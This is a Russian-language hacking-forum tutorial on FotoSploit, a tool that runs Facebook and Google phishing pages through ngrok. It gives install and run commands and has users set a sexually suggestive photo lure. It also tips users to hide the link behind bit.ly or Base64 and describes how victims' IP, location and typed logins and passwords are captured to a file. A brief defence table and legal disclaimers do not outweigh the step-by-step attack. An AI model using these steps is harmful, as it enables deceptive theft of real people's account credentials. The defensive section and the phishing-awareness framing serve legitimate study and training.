https://forum.antichat.xyz/attachmen...638407d2dc.png
Приветствую, Друзья и Форумчане!
Сегодня разберём FotoSploit — свежий (2025) инструмент от испанца Cesar-Hack-Gray для проведения фишинговых атак + социальной инженерии против аккаунтов Facebook / Google.
Цитата:
Информация предоставлена исключительно для обучения и анализа уязвимостей. Любое несанкционированное применение подпадает под ст. 272 УК РФ / Computer Misuse Act / GDPR.
|
Что под капотом- Ядро: старый добрый SocialFish с доработками под
и автоматическим туннелированием через ngrok.
- Лут: IP-адрес жертвы, HTTP headers (User-Agent), примерные Geo-координаты по GeoIP, плюс логин/пароль, если пользователь введёт их на поддельной форме.
- Фишка: «кликабельное откровенное фото» (JPG ≤ 500 KB) с заманчивым описанием и редиректом на реальный YouTube/Facebook, чтобы не вызвать подозрений.
Быстрая установка
Arch Linux / Manjaro
Код:
Код:
# git clone https://github.com/Cesar-Hack-Gray/FotoSploit.git
# mv FotoSploit /root/
# cd /root/FotoSploit
# chmod +x install.sh FotoSploit
# bash install.sh
# ./FotoSploit
Termux (Android)
Код:
Код:
pkg update && pkg upgrade -y
pkg install -y php python2 git
cd $HOME
git clone https://github.com/Cesar-Hack-Gray/FotoSploit
cd FotoSploit
bash install.sh
./FotoSploit
Подготовка поля боя- ngrok
- Если бинари не встали автоматически — качаем под свою архитектуру и кидаем в каталог инструмента (
).
- Приманка-фото
- Любой JPG ≤ 500 KB (разрешение не критично, но 430 × 430 px — оптимум).
- Кладём в
или
(см.
параметр).
- Тест-аккаунт
- Используем песочницу, чтобы не «стрельнуть» по продакшен-учётке.
Стартуем атаку
Код:
Код:
> show options
> set foto /root/pic.jpg
> set title "Моё откровенное фото здесь"
> set view YOUTUBE # либо FACEBOOK
> show options # проверяем
> go
https://forum.antichat.xyz/attachmen...6bc8be78e2.png
- Дожидаемся, пока скрипт прогрузит картинку без ошибок.
- Получаем ссылку вида
Код:
https://hbhg2fg1.ngrok.io/id=1.php
.
- Лайфхак: обфусцируйте URL (bit.ly, рекламный редирект, Base64 и т.д.), чтобы он выглядел правдоподобно.
Когда жертва переходит по ссылке, видит заставку 18+ и форму логина. Пока «тело думает», на вашей консоли уже лежат IP, User-Agent и гео-данные:
https://forum.antichat.xyz/attachmen...d9b0a1da6b.png
Если жертва всё же авторизуется — логин+пароль записываются в
Код:
sites/credentials.txt
, а она попадает на реальный YouTube-канал:
https://forum.antichat.xyz/attachmen...0424615a5f.png
Как это детектировать и отбиться
Техника защитыСуть2FA / FIDO2Даже при краже пароля злоумышленник не пройдёт второй фактор. Проверка URLОфициальные Facebook/Google-адреса всегда .com/ без
, bit.ly и лишних параметров. Браузер-алертыChrome/Edge помечают HTTP-формы «Небезопасно». Блокировка ngrokWAF или адресные ACL на
. Тренинги по фишингуРаз в квартал прогоняйте сотрудников через simulated-phish-кампании.
Юридический момент- РФ: несанкционированный доступ (ст. 272 УК), до 6 лет лишения свободы.
- ЕС: директива 2013/40/EU + GDPR (штрафы до 20 млн € или 4 % оборота).
- Pen-test ≠ взлом: нужен письменный договор и чёткое согласие владельца системы.
Итоги- FotoSploit — удобный конструктор фейковых страниц, но ничего принципиально нового: SocialFish + ngrok + JPG-приманка.
- Полезен только в рамках легального Red Team/Phishing-Simulation с согласием заказчика.
- Защититься помогают базовые меры — 2FA, фильтрация туннелей и здравый смысл пользователя.
Будьте этичными. Знание атаки — первый шаг к обороне.
До новых встреч, всем удачи и безопасных дорог в сети!
|
